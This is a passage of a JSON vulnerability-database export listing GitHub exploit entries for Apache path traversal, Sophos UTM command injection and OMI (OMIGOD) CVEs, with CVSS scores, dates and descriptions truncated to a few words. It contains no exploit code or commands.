"2022-02-19T12:14:33", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:30", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "0C47BCF2-EA6F-5613-A6E8-B707D64155DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T20:32:50", "description": "# CVE-2021-42013\r\n\r\n## Description\r\n\r\nThis script exploits CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-08T21:48:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-23T16:46:10", "id": "C879EE66-6B75-5EC8-AA68-08693C6CCAD1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:23", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "A8616E5E-04F8-56D8-ACB4-32FDF7F66EED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:11:27", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-25T09:07:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:38:27", "id": "68A13FF0-60E5-5A29-9248-83A940B0FB02", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773-Playground\nSome docker images to play with CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-04T22:52:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-11T09:06:38", "id": "86360765-0B1A-5D73-A805-BAE8F1B5D16D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773|CVE-2021-42013: Path Traversal Zero-Day in Apac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T14:58:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-07T19:19:39", "id": "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:27:46", "description": "## \u6f0f\u6d1e\u540d\u79f0\n\nApache \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c \uff08CVE-2021-42013\uff09\n\n## \u6f0f\u6d1e\u63cf\u8ff0\n\nApache HTTP Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T14:46:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-08T16:14:48", "id": "78787F63-0356-51EC-B32A-B9BD114431C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-04T01:18:36", "description": "# CVE-2021-41773\n\n## Usage\n\n```bash\ndocker-compose up --build vu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-27T22:39:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-04T00:11:58", "id": "6CAA7558-723B-5286-9840-4DF4EB48E0AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\nA Zeek package which raises notices for Path T...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T06:54:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T05:48:41", "id": "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 and CVE-2021-42013 Lab Setup\n\n## Setup \n```\n$ g...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-18T12:01:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-12-10T06:09:44", "id": "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-28T21:50:54", "description": "# SimplesApachePathTraversal\n\n\n\n<p align=\"center\">\n<a href=\"http...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T17:03:56", "type": "githubexploit", "title": "Exploit for Files or Directories Accessible to External Parties in Apache Flink", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773", "CVE-2020-17519"], "modified": "2022-02-28T17:25:24", "id": "11813536-2AFF-5EA4-B09F-E9EB340DDD26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:33:56", "description": "# sophucked\nCVE-2020-25223 RCE PoC, gets reverse shell. Pre-auth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-29T11:08:53", "type": "githubexploit", "title": "Exploit for OS Command Injection in Sophos Unified Threat Management", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2022-05-19T11:27:41", "id": "AD440E9E-3A07-5AB3-99A0-11DD4C08AF47", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:33:58", "description": "# CVE-2020-25223\n\nA PoC script for testing CVE-2020-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T15:58:08", "type": "githubexploit", "title": "Exploit for OS Command Injection in Sophos Unified Threat Management", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2022-04-12T05:57:11", "id": "9F5B4253-EC2A-5A25-AB3C-CB76E45F7923", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:26", "description": "# cve-2021-38647\nhttps://github.com/corelight/CVE-2021-38647 wit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T15:20:40", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-22T15:29:15", "id": "610ADCD3-C281-52D4-A546-467569FE3AC1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:57", "description": "# omigood (OM I GOOD?)\n\nThis repository contains a free scanner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T15:34:03", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-07-13T20:33:30", "id": "A6B7D4D8-4578-5AD8-961D-3BC35007FF29", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-10T07:14:55", "description": "# Details\n## OMIGod - CVE-2021-38647\nOpen Management Infrastruct...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-19T15:43:32", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-10T05:21:40", "id": "64DFB465-6754-5E4B-B311-7668EDD4D962", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:56", "description": "# cve-2021-38647\nA PoC exploit for CVE-2021-38647 RCE in OMI.\n\nE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T08:33:02", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-29T12:13:38", "id": "8B4EDA16-9E27-500D-B648-9C3AD4295562", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T06:18:53", "description": "# OMIGOD\nProof on Concept Exploit for CVE-2021-38647 (OMIGOD)\n\nF...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T02:11:36", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-17T05:00:10", "id": "BF40B403-9D06-5460-8B40-3FC2E56A4A07", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:00", "description": "# CVE-2021-38647\n\n\nThis is a POC for CVE-2021-38647 :\n\nSend a PO...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 